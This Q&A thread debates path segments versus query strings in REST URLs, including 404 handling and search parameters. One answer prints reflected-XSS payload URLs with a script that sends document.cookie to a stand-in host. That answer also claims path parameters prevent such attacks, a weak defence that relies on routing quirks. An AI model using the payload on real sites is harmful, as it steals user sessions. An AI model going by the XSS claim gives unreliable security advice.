79

I had a discussion with a colleague today around using query strings in REST URLs. Take these 2 examples:

1. http://localhost/findbyproductcode/4xxheua
2. http://localhost/findbyproductcode?productcode=4xxheua

My stance was that the URLs should be designed as in example 1. This is cleaner and, I think, correct within REST. In my view it would be entirely correct to return a 404 error from example 1 if the product code did not exist, whereas with example 2 returning a 404 would be wrong because the page itself should exist. His stance was that it didn't really matter and that they both do the same thing.

As neither of us was able to find concrete evidence (admittedly my search was not extensive), I would like to know other people's opinions on this.

Luke Girvin
pythonandchips
  • Thanks for all the answers, folks. After some more reading/research, he has now conceded that option 1 is better than option 2. – pythonandchips Oct 01 '10 at 12:48
  • 32
    Note that resources in REST should be nouns and not verbs. "Find by product code" is therefore inappropriate in the first place. – fletom Jul 18 '13 at 07:27

10 Answers

90

There is no difference between the two URIs from the perspective of the client. URIs are opaque to the client. Use whichever maps more cleanly into your server side infrastructure.

As far as REST is concerned there is absolutely no difference. I believe so many people think that only the path component identifies the resource because of the following line in RFC 2396:

The query component is a string of information to be interpreted by the resource.

This line was later changed in RFC 3986 to be:

The query component contains non-hierarchical data that, along with data in the path component (Section 3.3), serves to identify a resource

IMHO this means both query string and path segment are functionally equivalent when it comes to identifying a resource.
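
To make the two components concrete, here is a minimal sketch using Python's standard `urllib.parse` on the two URIs from the question. The helper name `components` is only illustrative; the point is that the product code lands in the path in one style and in the query in the other, and under RFC 3986 both parts contribute to identifying the resource.

```python
from urllib.parse import urlsplit


def components(uri):
    """Return the (path, query) pair of a URI, as split by urllib.parse."""
    parts = urlsplit(uri)
    return parts.path, parts.query


# Style 1: the product code is part of the hierarchical path.
print(components("http://localhost/findbyproductcode/4xxheua"))

# Style 2: the product code is carried in the non-hierarchical query.
print(components("http://localhost/findbyproductcode?productcode=4xxheua"))
```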


Update to address Steve's comment.

Forgive me if I object to the adjective "cleaner". It is just way too subjective. You do have a point though that I missed a significant part of the question.

I think the answer to whether to return 404 depends on what the resource is that is being retrieved. Is it a representation of a search result, or is it a representation of a product? To know this you really need to look at the link relation that led us to the URL.

If the URL is supposed to return a Product representation then a 404 should be returned if the code does not exist. If the URL returns a search result then it shouldn't return a 404.

The end result is that what the URL looks like is not the determining factor. Having said that, it is convention that query strings are used to return search results so it is more intuitive to use that style of URL when you don't want to return 404s.
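
As a rough sketch of that point, assuming both URL styles are meant to return a Product representation: the same lookup can sit behind either style and return 404 in both cases when the code is unknown. The `PRODUCTS` dictionary and the function names are hypothetical, not taken from any framework.

```python
from urllib.parse import urlsplit, parse_qs

# Hypothetical in-memory catalogue keyed by product code.
PRODUCTS = {"4xxheua": {"code": "4xxheua", "name": "Example product"}}

PREFIX = "/findbyproductcode/"


def extract_code(uri):
    """Pull the product code out of either URI style, or return None."""
    parts = urlsplit(uri)
    if parts.path.startswith(PREFIX):
        # Style 1: code is the last path segment.
        return parts.path[len(PREFIX):] or None
    # Style 2: code is the "productcode" query parameter.
    values = parse_qs(parts.query).get("productcode")
    return values[0] if values else None


def get_product(uri):
    """Treat the URI as identifying one product: 404 when it does not exist."""
    product = PRODUCTS.get(extract_code(uri))
    return (200, product) if product else (404, None)
```

If the resource were instead defined as a search result, the same two URL shapes could just as well return 200 with an empty list; the status code follows from what the resource is, not from where the code appears in the URL.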

wprl
Darrel Miller
  • 13
    Quoting the RFC spec is fine but that's not exactly the question being asked. Yes, the two examples are functionally equivalent - that is not in dispute. The question goes beyond the textbook "definition" of a resource (which applies to both). To his question: what should happen if the code in the query string isn't there? 404? What about the "cleaner" aspect of his question? Both are "valid", yes, but IMHO, #1 is "cleaner" and more in line with what he is seeking (in conjunction with my answer below with StackOverflow). – Steve Michelotti Sep 29 '10 at 21:47
  • 5
    I agree with the comparison you gave in your updated answer. query string makes sense for a search result with no 404s. For a product code (as per this question) 404 makes sense and IMO it's more common to not use query string for this scenario. Thanks for the updated answer. – Steve Michelotti Sep 30 '10 at 01:05
  • @DarrelMiller what do you mean by "IMHO this means both query string and path segment are functionally equivalent when it comes to identifying a resource."? Are you saying that http://foo/resources and http://foo/resources?queryParam=bar are to be seen as the same resource identifiers? Or that, although different resource identifiers, they identify the same resource? – Les Hazlewood Dec 29 '11 at 21:34
  • 1
    @LesHazlewood Neither. They are two different resource identifiers that identify two different resources but either one would work just as effectively. – Darrel Miller Dec 29 '11 at 21:45
51

In typical REST APIs, example #1 is more correct. Resources are identified by URIs, and #1 expresses that more directly. Returning a 404 when the product code is not found is absolutely the correct behavior. Having said that, I would modify #1 slightly to be a little more expressive, like this:

http://localhost/products/code/4xheaua

Look at other well-designed REST APIs - for example, look at StackOverflow. You have:

stackoverflow.com/questions
stackoverflow.com/questions/tagged/rest
stackoverflow.com/questions/3821663

These are all different ways of getting at "questions".

Miika L.
Steve Michelotti
  • 11
    +1 because findbyproductcode is more verb than noun - it's an RPC call, not a resource. However, I think the question changes a bit, and the answer too, when you have more than one search criterion instead of just product code. /products?size={size}&color={color} . I'd be interested in your thoughts on that. – ScottCher May 03 '12 at 13:16
  • 37
    I'd say: if *code*, `4xheaua`, is **the** product ID then I'd better go with `domain/products/4xheaua`. Instead, if *code* is just one of many search criteria, then I'd go with `domain/products?code=4xheaua`. – superjos Apr 17 '13 at 13:20
  • 1
    I'll add that extra path parts should express a hierarchical, directory-like relationship. This, I believe, is the underlying principle of what @superjos (+1) said. But, not all resources have IDs, so it's a little more general. – wprl May 17 '14 at 03:07
  • This is correct. This enables you to do things like http://localhost/products/new/ or http://localhost/products/firesale – richard Aug 06 '14 at 16:41
  • What if the resource is identified by 2 fields? /domain/projects?code=xxx&name=xxx – PeiSong Apr 17 '19 at 12:07
13

There are two use cases for GET

  1. Get a uniquely identified resource
  2. Search for resource(s) based on given criteria

Use Case 1 Example:

/products/4xxheua
Get a uniquely identified product, returns 404 if not found.

Use Case 2 Example:

/products?size=large&color=red
Search for a product, returns list of matching products (0 to many).

If we look at, say, the Google Maps API, we can see that it uses a query string for search.

e.g. http://maps.googleapis.com/maps/api/geocode/json?address=los+angeles,+ca&sensor=false

So both styles are valid for their own use cases.
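
A minimal sketch of the two use cases side by side, assuming a hypothetical in-memory `PRODUCTS` list and a hand-rolled `handle_get` dispatcher rather than any particular web framework:

```python
from urllib.parse import urlsplit, parse_qsl

# Hypothetical sample data; "9zzkqtb" is a made-up second product.
PRODUCTS = [
    {"id": "4xxheua", "size": "large", "color": "red"},
    {"id": "9zzkqtb", "size": "small", "color": "red"},
]


def handle_get(uri):
    """Return a (status, body) pair for a GET on the given URI."""
    parts = urlsplit(uri)
    segments = [s for s in parts.path.split("/") if s]

    # Use case 2: /products?size=...&color=... is a search, always 200.
    if segments == ["products"]:
        criteria = parse_qsl(parts.query)
        matches = [p for p in PRODUCTS
                   if all(p.get(key) == value for key, value in criteria)]
        return 200, matches

    # Use case 1: /products/<id> identifies one product, 404 if unknown.
    if len(segments) == 2 and segments[0] == "products":
        for product in PRODUCTS:
            if product["id"] == segments[1]:
                return 200, product
        return 404, None

    return 404, None
```

Here a search with no matches still answers 200 with an empty list, while a lookup of an unknown id answers 404.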

Michael Brown
4

The way I think of it, the URI path defines the resource, while optional querystrings supply user-defined information. So

https://domain.com/products/42

identifies a particular product while

https://domain.com/products?price=under+5

might search for products under $5.

I disagree with those who said using querystrings to identify a resource is consistent with REST. A big part of REST is creating an API that imitates a static hierarchical file system (without literally needing such a system on the backend); this makes for intuitive, semantic resource identifiers. Querystrings break this hierarchy. For example, watches are an accessory that themselves have accessories. In the REST style it's pretty clear what

 https://domain.com/accessories/watches

and

https://domain.com/watches/accessories

each refer to. With querystrings,

 https://domain.com?product=watches&category=accessories

is not very clear.

At the very least, the REST style is better than querystrings because it requires roughly half as much information since strong-ordering of parameters allows us to ditch the parameter names.

Matthew
  • 1
    Brilliant answer. I fully agree. I'd just add that query strings should still be used in 3 situations: (i) Pagination. Example: domain.com/accessories/watches?page=1 (ii) Filtering attributes: domain.com/accessories/watches?fields=maker,model,price (iii) Search criteria: domain.com/accessories/watches?price=LE+100 – Paulo Merson Nov 04 '15 at 13:51
4

IMO the path component should always state what you want to retrieve. A URL like http://localhost/findbyproductcode says only that I want to retrieve something by product code, but what exactly?

So you retrieve contacts with http://localhost/contacts and users with http://localhost/users. The query string is only used for retrieving a subset of such a list based on resource attributes. The only exception to this is when this subset is reduced to one record based on the primary key, then you use something like http://localhost/contact/[primary_key].

That's my approach, your mileage may vary :)

Sfynx
3

This question is about which approach is cleaner, but I want to focus on a different aspect: security. When I started working intensively on application security, I found that a reflected XSS attack can be successfully prevented by using PathParams (approach 1) instead of QueryParams (approach 2).

(Of course, the prerequisite of a reflected XSS attack is that the malicious user input gets reflected back to the client within the HTML source. Unfortunately some applications will do that, and this is why PathParams may prevent XSS attacks.)

The reason why this works is that the XSS payload in combination with PathParams will result in an unknown, undefined URL path due to the slashes within the payload itself.

http://victim.com/findbyproductcode/<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>

Whereas this attack will succeed when a QueryParam is used!

http://localhost/findbyproductcode?productcode=<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>
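
The routing effect described above can be sketched as follows. This assumes a hypothetical router that matches exactly one raw, undecoded path segment after /findbyproductcode/; `ROUTE` and `route_product_code` are illustrative names, and a server that decodes or normalizes the path before routing may behave differently.

```python
import re
from urllib.parse import urlsplit

# Assumed route: exactly one path segment (no "/") after the prefix.
ROUTE = re.compile(r"/findbyproductcode/([^/]+)")

PAYLOAD = ("<script>location.href='http://hacker.com?sessionToken='"
           "+document.cookie;</script>")


def route_product_code(uri):
    """Return the matched product code, or None if no route matches."""
    match = ROUTE.fullmatch(urlsplit(uri).path)
    return match.group(1) if match else None


# A normal product code is a single segment, so the route matches.
print(route_product_code("http://victim.com/findbyproductcode/4xxheua"))

# The slashes inside the payload create extra path segments, so the
# route does not match and the payload never reaches the handler.
print(route_product_code("http://victim.com/findbyproductcode/" + PAYLOAD))
```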
My-Name-Is
3

The ending of those two URIs is not very significant RESTfully.

However, the 'findbyproductcode' portion could certainly be more restful. Why not just http://localhost/product/4xxheau ?

In my limited experience, if you have a unique identifier then it would look clean to construct the URI like .../product/{id}. However, if product code is not unique, then I might design it more like #2.

However, as Darrel has observed, the client should not care what the URI looks like.

pc1oad1etter
  • +1 for "if product code is not unique". It would be somewhat counterintuitive to write e.g. `http://www.google.com/search/democracy` instead of `http://www.google.com/search?q=democracy`... or is it just our habit? – Sergey Orshanskiy Oct 08 '13 at 20:36
2

The query string is unavoidable in many practical senses... Consider what would happen if the search allowed multiple (optional) fields to all be specified. In the first form, their positions in the hierarchy would have to be fixed and padded...

Imagine coding a general SQL "where clause" in that format... However, as a query string, it is quite simple.
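
To illustrate, here is a minimal sketch that turns optional query-string fields into a parameterized WHERE clause. The column whitelist `ALLOWED_COLUMNS` and the function `build_where` are assumptions made for the example; only whitelisted names are interpolated into the SQL, and values are passed as bound parameters.

```python
from urllib.parse import parse_qsl

# Hypothetical set of searchable columns.
ALLOWED_COLUMNS = ("size", "color", "code")


def build_where(query_string):
    """Build (sql_fragment, params) from whichever fields are present."""
    clauses, params = [], []
    for key, value in parse_qsl(query_string):
        if key in ALLOWED_COLUMNS:       # ignore unknown field names
            clauses.append(f"{key} = ?")  # value stays a bound parameter
            params.append(value)
    sql = (" WHERE " + " AND ".join(clauses)) if clauses else ""
    return sql, params


print(build_where("size=large&color=red"))
print(build_where("color=red"))
```

Any subset of the fields works in any order, which is the part that would need fixed positions and padding in a purely path-based form.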

David V. Corbin
2

For the REST client the URI structure does not matter, because it follows links annotated with semantics and never parses the URI.

For the developer who writes the routing and link-generation logic, and who probably wants to understand logs by checking the URLs, the URI structure does matter. In REST we map URIs to resources and not to operations (Fielding dissertation / uniform interface / identification of resources).

So both URI structures are probably flawed, because they contain verbs in their current format.

1. /findbyproductcode/4xxheua
2. /findbyproductcode?productcode=4xxheua

You can remove find from the URIs this way:

1. /products/code:4xxheua
2. /products?code="4xxheua"

From a REST perspective it does not matter which one you choose.

You can define your own naming convention, for example: "when reducing the collection to a single resource using a unique identifier, the unique identifier must always be part of the path and not the query". This is just what the URI standard states: the path is hierarchical, the query is non-hierarchical. So I would use /products/code:4xxheua.
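
On the server side, the routing logic for such a convention might look like this sketch. The `key:value` segment format is just the naming convention proposed in this answer, and `parse_product_path` is a hypothetical helper, not part of any standard.

```python
def parse_product_path(path):
    """Parse /products/<key>:<value> into (key, value), else None."""
    segments = [s for s in path.split("/") if s]
    if len(segments) != 2 or segments[0] != "products":
        return None
    key, sep, value = segments[1].partition(":")
    if not sep or not key or not value:
        return None  # segment does not follow the key:value convention
    return key, value


print(parse_product_path("/products/code:4xxheua"))
```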

inf3rno
1

Philosophically speaking, pages do not "exist". When you put books or papers on your bookshelf, they stay there. They have some separate existence on that shelf. However, a page exists only so long as it is hosted on some computer that is turned on and able to provide it on demand. The page can, of course, be always generated on the fly, so it doesn't need to have any special existence prior to your request.

Now think about it from the point of view of the server. Let's assume it is, say, a properly configured Apache, not a one-line Python server that just maps all requests to the file system. Then the particular path specified in the URL may have nothing to do with the location of a particular file in the filesystem. So, once again, a page does not "exist" in any clear sense. Perhaps you request http://some.url/products/intel.html, and you get a page; then you request http://some.url/products/bigmac.html, and you see nothing. It doesn't mean that there is one file but not the other. You may not have permissions to access the other file, so the server returns 404, or perhaps bigmac.html was to be served from a remote McDonald's server, which is temporarily down.

What I am trying to explain is, 404 is just a number. There is nothing special about it: it could have been 40404 or -2349.23847, we've just agreed to use 404. It means that the server is there, it communicates with you, it probably understood what you wanted, and it has nothing to give back to you. If you think it is appropriate to return 404 for http://some.url/products/bigmac.html when the server decides not to serve the file for whatever reason, then you might as well agree to return 404 for http://some.url/products?id=bigmac.

Now, if you want to be helpful for users with a browser who are trying to manually edit the URL, you might redirect them to a page with the list of all products and some search capabilities instead of just giving them a 404 --- or you can give a 404 as a code and a link to all products. But then, you can do the same thing with http://some.url/products/bigmac.html: automatically redirect to a page with all products.

Sergey Orshanskiy